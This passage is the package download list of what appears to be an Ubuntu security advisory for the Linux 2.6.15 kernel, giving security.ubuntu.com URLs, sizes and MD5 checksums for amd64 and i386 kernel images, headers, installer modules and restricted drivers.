    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:   102298 d3cab2356a994332dc149c55d7067420
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:    38902 decce0fec65dcdd7526c034a82380c8f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:    49134 888a8e70bb07cc2da05515cdd171f71a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:   176704 6cb80c9c290f507196c7019e2fc67873
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:    36778 c630788a9c3f3e0f3a1689bfdcf2b491
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:   142244 158acffdcdfe6840a9e6c26debc8bfe1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:    51068 9f6a06bd03c007391faac856daae1325
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:   140614 d0fe8f30dba749259e38bcd559ebd18a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:   286850 2e3d84300f04bdd3ac582da9ceb82828
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:    97798 727d7dd42bfff577b91a488bc76df679
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:  1651786 9747740a9f96bbca0fff9946eeb2ee1c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-amd64-generic_2.6.15-54.76_amd64.deb
      Size/MD5:   872390 529643a555e2e3f1534a144b6244ed82
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-amd64-k8_2.6.15-54.76_amd64.deb
      Size/MD5:   872858 fca02b3806a057739dad683c0fbeb2ca
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-amd64-server_2.6.15-54.76_amd64.deb
      Size/MD5:   872584 0f73196457e545f1a2519029f21812a2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-amd64-xeon_2.6.15-54.76_amd64.deb
      Size/MD5:   870622 b82563ecad53d18dd6daaf3fbdfc6fdd
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54_2.6.15-54.76_amd64.deb
      Size/MD5:  6925202 177d06b1a911ef736990c7b501cba51d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-amd64-generic_2.6.15-54.76_amd64.deb
      Size/MD5: 20815514 7b3509ffd0c2a9d0921cf3ae9890dc3b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-amd64-k8_2.6.15-54.76_amd64.deb
      Size/MD5: 20785406 3e731b97906ac872ad1b280eeb399ea6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-amd64-server_2.6.15-54.76_amd64.deb
      Size/MD5: 21630838 a62ece0b1ffeb40d14cea949fa4afc0d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-amd64-xeon_2.6.15-54.76_amd64.deb
      Size/MD5: 19903892 db9c9077bfdc96c867d138bf030fd6f5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:    15648 2dcadb74b4a8d488173a5ff8af026810
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:   240380 68339d700af3fcf578c27cd4e953c14d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:   202602 f7bb412a05e07b6899187834d97a661d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:  1048608 b3724f20f9f46903c9db97e89b4919ae
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:  1542984 8ad69667747089d38494cf530e53dc7d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:   161644 2fa0908c04c768ecdfd884c9254aa9fd
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:     9824 7daa66a4454f78553ebec38a63b568d9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:    80858 0eb5fb9479b5f6ad05bb87bc5ce34745
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:    49172 59154336fa455d85d678c63f21a216cd
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:    35158 297ae6098e2824504cdfbc289eb6785e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:    70888 c4466f0942b67bbdb601061bbd8e7372
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:     6224 00ab684aab012aaf220735a695bead96
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:     9060 f70690acfc45eb7ea126ced0cf26cf27
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:    57888 6a4e4f8eb8f80d37ab9262528d19e005
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:   123326 bd8eafc9e2bd0dc6d101c7ffd339b1b8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:   101028 90b8feef6dab4c9ca49ddf515e42a235
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:    79248 5c818a5a5ae90e64aababf31edc68c60
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:  1594804 ec9ee02d98a0d0feb3580cca8c8c89fe
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:    72290 fd2543ef71d80f43df38b2d43b3faba5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:    12648 ac8e6bc8f763730c35aab948876f3e40
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:    33738 06916a3bebc757c1813b8a381496b06b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:   138530 e7ba35910b256515a921bb8998bd5250
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:    38940 20b0a245cc7ec48fd01c146a4ed5d2e9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:   278758 a796bd5d7b46b068a9cdd9408fefeffa
    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/avm-fritz-kernel-source_3.11+2.6.15.12-54.5_amd64.deb
      Size/MD5:  2405654 564cb7609ed265ad30a2e269be27bcdc
    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/fglrx-kernel-source_8.25.18+2.6.15.12-54.5_amd64.deb
      Size/MD5:   510960 62bb7ec34650cb1dc12a382372524e10
    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/nvidia-kernel-source_1.0.8776+2.6.15.12-54.5_amd64.deb
      Size/MD5:  1754930 a928a48613646a303bbf48ddda70a63f
    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/nvidia-legacy-kernel-source_1.0.7174+2.6.15.12-54.5_amd64.deb
      Size/MD5:  1406336 35558fa419d4de7091c36b343dbbe157
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/avm-fritz-firmware_2.6.15.55_amd64.deb
      Size/MD5:    23748 ebbb5a6d0321f2ce606a877025537850
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-amd64-generic_2.6.15.55_amd64.deb
      Size/MD5:    23744 70a126d9c77de3f3a27799cc9154a285
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-amd64-k8-smp_2.6.15.55_amd64.deb
      Size/MD5:    23818 8ca2929f83d605a72e67fde1fa1753d7
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-amd64-k8_2.6.15.55_amd64.deb
      Size/MD5:    23750 9c0231f5a6398326b8756f65aa928ef9
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-amd64-server_2.6.15.55_amd64.deb
      Size/MD5:    23732 faf83652d6758d561bdd2a96ea60d256
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-amd64-xeon_2.6.15.55_amd64.deb
      Size/MD5:    23746 7ff436330283a0f47d5523d474551575
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-restricted-modules-amd64-generic_2.6.15.55_amd64.deb
      Size/MD5:    23758 52162bf8a074e7d72fa6be588369d7f7
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-restricted-modules-amd64-k8_2.6.15.55_amd64.deb
      Size/MD5:    23764 9edbcf4cdca9cf5fb1b8577c9e770d39
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-restricted-modules-amd64-xeon_2.6.15.55_amd64.deb
      Size/MD5:    23758 9d3fb48f81f96319aa541c345b528bd2
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux_2.6.15.55_amd64.deb
      Size/MD5:    23696 a2193feee6e5dc28cc9b23bca625c1ed
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/avm-fritz-firmware-2.6.15-54_3.11+2.6.15.12-54.5_amd64.deb
      Size/MD5:   475612 84ed75f90905d50c2582e667440b0b0c
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/fglrx-control_8.25.18+2.6.15.12-54.5_amd64.deb
      Size/MD5:    76798 64beb449b200836a8495f4467c057c68
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-54-amd64-generic_2.6.15.12-54.5_amd64.deb
      Size/MD5:  6861910 fccca37dbf8ef81d5ee3ed7846655741
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-54-amd64-k8_2.6.15.12-54.5_amd64.deb
      Size/MD5:  6861342 e0d68fd07a074715789731cc63a18caf
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-54-amd64-xeon_2.6.15.12-54.5_amd64.deb
      Size/MD5:  6837920 fbafb26090da44357af4502e83616686
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-firmware-2.6.15-54-amd64-generic-di_2.6.15.12-54.5_amd64.udeb
      Size/MD5:   798888 f4fc23d17b07401e1c43c255778e8a3d
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-modules-2.6.15-54-amd64-generic-di_2.6.15.12-54.5_amd64.udeb
      Size/MD5:   497238 5110b7a3c3637b246154b19f006e2539
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-dev_1.0.8776+2.6.15.12-54.5_amd64.deb
      Size/MD5:   167302 4e5a9fd4878297dfe90896ecd954a447
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-legacy-dev_1.0.7174+2.6.15.12-54.5_amd64.deb
      Size/MD5:   162378 789c851202cd45adc9a72d45dca086e8
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-legacy_1.0.7174+2.6.15.12-54.5_amd64.deb
      Size/MD5:  6071846 58a79e09f8fb392e0afff7fa630527c1
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx_1.0.8776+2.6.15.12-54.5_amd64.deb
      Size/MD5:  7328654 5b1a94a13a7da4ff4c78d885d8f3451f
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/xorg-driver-fglrx-dev_7.0.0-8.25.18+2.6.15.12-54.5_amd64.deb
      Size/MD5:   125938 1b79f85bfed44197195b52aec7284c7e
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/xorg-driver-fglrx_7.0.0-8.25.18+2.6.15.12-54.5_amd64.deb
      Size/MD5: 17297124 188d805c0d805a6ef4c4412b03ebf508

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-54-386_2.6.15-54.12_i386.deb
      Size/MD5:   169488 f7c22d047574d450f18bb987ebab3985
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-54-686_2.6.15-54.12_i386.deb
      Size/MD5:   177320 984bbf52a0f256588fb760f8767150b9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-54-k7_2.6.15-54.12_i386.deb
      Size/MD5:   175488 ed7400b9140b0b87c12a6c1be3daa332
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-54-server-bigiron_2.6.15-54.12_i386.deb
      Size/MD5:   178306 e0e1d3be0da2437ba6dee5a4759cac92
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-54-server_2.6.15-54.12_i386.deb
      Size/MD5:   177670 dd76f8361c9537a6a759fd0299f9a3e4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/nic-updates-modules-2.6.15-54-386-di_2.6.15-54.12_i386.udeb
      Size/MD5:    90230 a6280f259032e67c99c6574802caa83f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/scsi-updates-modules-2.6.15-54-386-di_2.6.15-54.12_i386.udeb
      Size/MD5:    90404 4b904227c2aac7a1e4693800d3c9e1c8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-backports-modules-386_2.6.15.55_i386.deb
      Size/MD5:    23712 2652739e2803bea288d963fdf79717b4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-backports-modules-686_2.6.15.55_i386.deb
      Size/MD5:    23712 00bb14e3e8802eb9f67304dffacf853d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-backports-modules-k7_2.6.15.55_i386.deb
      Size/MD5:    23710 622de9bd19844403fa869550c40d781c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-backports-modules-server-bigiron_2.6.15.55_i386.deb
      Size/MD5:    23726 ca02659dcea6704b736425f7eaa60c62
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-backports-modules-server_2.6.15.55_i386.deb
      Size/MD5:    23714 e23f32383cc1203592e536dda8c88e90
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-386_2.6.15.55_i386.deb
      Size/MD5:    23704 c50f9d8bbb25a29d953f5547573938be
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-686_2.6.15.55_i386.deb
      Size/MD5:    23734 660b6630d8db73d410a6661140da0211
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-k7_2.6.15.55_i386.deb
      Size/MD5:    23716 d1e7885a2023f38619101ad247be97ba
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-server-bigiron_2.6.15.55_i386.deb
      Size/MD5:    23746 0d0311babeb9c6e4fd2509b10cacc4d4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-server_2.6.15.55_i386.deb
      Size/MD5:    23730 5ef159a9f7360a3c530305d5bf1202cd
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-386_2.6.15.55_i386.deb
      Size/MD5:    23700 a8ddcc044be4333229f01ef8283774ab
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-686_2.6.15.55_i386.deb
      Size/MD5:    23730 14408a22ed9e155d4d9cc7078ac96fd7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-k7_2.6.15.55_i386.deb
      Size/MD5:    23714 991091e5ae7e0ccd37438d5236f1549e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-server-bigiron_2.6.15.55_i386.deb
      Size/MD5:    23742 9414d53ce83606e4d93a892bd2000e6e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-server_2.6.15.55_i386.deb
      Size/MD5:    23722 c27f827e530c36b788f86ad6181ac46e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:    18974 834cb5b013bb673e24fe8802d40231d2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:    43458 42ca43727105593aa29df05213604b49
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:   105208 1135de3c0ea1423f02197ee148a37070
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:     2284 8a448f0f6191a40b366708ce458bfb64
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:    34576 5c2908d328a15f8ead6953e0bf5f61a3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:    96956 2d04d8bd081916758615e5ff8e0aa103
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:    37094 229453b4d64f390a8019557049f84110
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:    44076 49bccb07267cc59bf6aef95ca4edc191
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:   167748 368159c9dbaf64b0e6fe1b540894c898
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:    33938 308c19ee1f3acb31bc13cb030bde65c8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:   137860 3b1c9ac19699247364dfe241c98c68e5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:    46880 b5b0b13b128573bfa84b3f440923c5a4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:   132990 be3cae0238b9b2c4325ec598e9d21883
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:   273440 d0553751a0274f02c85a84ab79b15107
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:   102260 e478ea037d6c06883702c83bc728a074
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:  1596140 4b92b879629e796fce4994a08ca5c866
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-386_2.6.15-54.76_i386.deb
      Size/MD5:   859404 eeccf18357b270f45f16a49797bea0cf
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-686_2.6.15-54.76_i386.deb
      Size/MD5:   859980 0ef98b303b5167acdad1c46dc0cacd81
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-k7_2.6.15-54.76_i386.deb
      Size/MD5:   862424 0bedb75725fa64acd2438190da87e971
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-server-bigiron_2.6.15-54.76_i386.deb
      Size/MD5:   866108 f061ba0c10b51fef4f1db612485d4111
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-server_2.6.15-54.76_i386.deb
      Size/MD5:   864582 84191a09840f29d8195387e613ee0535
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54_2.6.15-54.76_i386.deb
      Size/MD5:  6917162 8f0f3f4d1e0ab35896fc21be5f82ecc4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-386_2.6.15-54.76_i386.deb
      Size/MD5: 21712514 d7f3d56bd86cea1b8fd114d45bd90c4c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-686_2.6.15-54.76_i386.deb
      Size/MD5: 22506098 2a57590032ee2adbf9e79a89948a1cbc
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-k7_2.6.15-54.76_i386.deb
      Size/MD5: 22255438 e542141063b15a455c3b039542cdb73e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-server-bigiron_2.6.15-54.76_i386.deb
      Size/MD5: 23618894 a9753656b0d7708ce0b8c0c40c458c1c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-server_2.6.15-54.76_i386.deb
      Size/MD5: 23173160 8f604874f317fcb84e6e59633c0053af
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:    15506 8fa6da7c66d725e72b51cad113b7514a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:   238528 77fd81efe68cd0769a53da061a8850ab
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:   197000 dd04020f21cfb5534eb93f223f2c19fb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:  1048388 bfdd122c47619ed3deaf414774bc6a60
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:  1740888 e52eae3b7bc616bd3a1dfe3ffc603b97
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:   160814 5e3595f3b7b046e84f4e1e4f36871ed8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:     9164 4d00db51f5387ce5b4d3fcbe3ff23dd3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:    76486 cab5704ff082f6012d51fb94d11bafe1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:    53258 b5684ac6645b6b6fa10b06b31832d3ed
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:    33050 7e3f21733c829a9cbd3b345da2884121
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:    85628 0b3b71020e8037ba635682e77e06e377
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:     6022 d9110280fcb62bbe65feb431f8703caf
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:     8760 8d949b8c0f9d7f1ef3aceec478251972
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:    53636 c62c18510cc9c70d2d871dc9305e0d03
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:   130774 684ed5a6d7572633374f18fcfb19fd15
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:    98432 4c74502762cad6472bdfa27ec6acddec
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:    77190 1f3737236db14474e32608d559e4829d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:  1768396 b51ed1454c550c8b13547ef8f0da0203
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:    69572 59ece032ba7cf13d1c48cb750abb7ea8
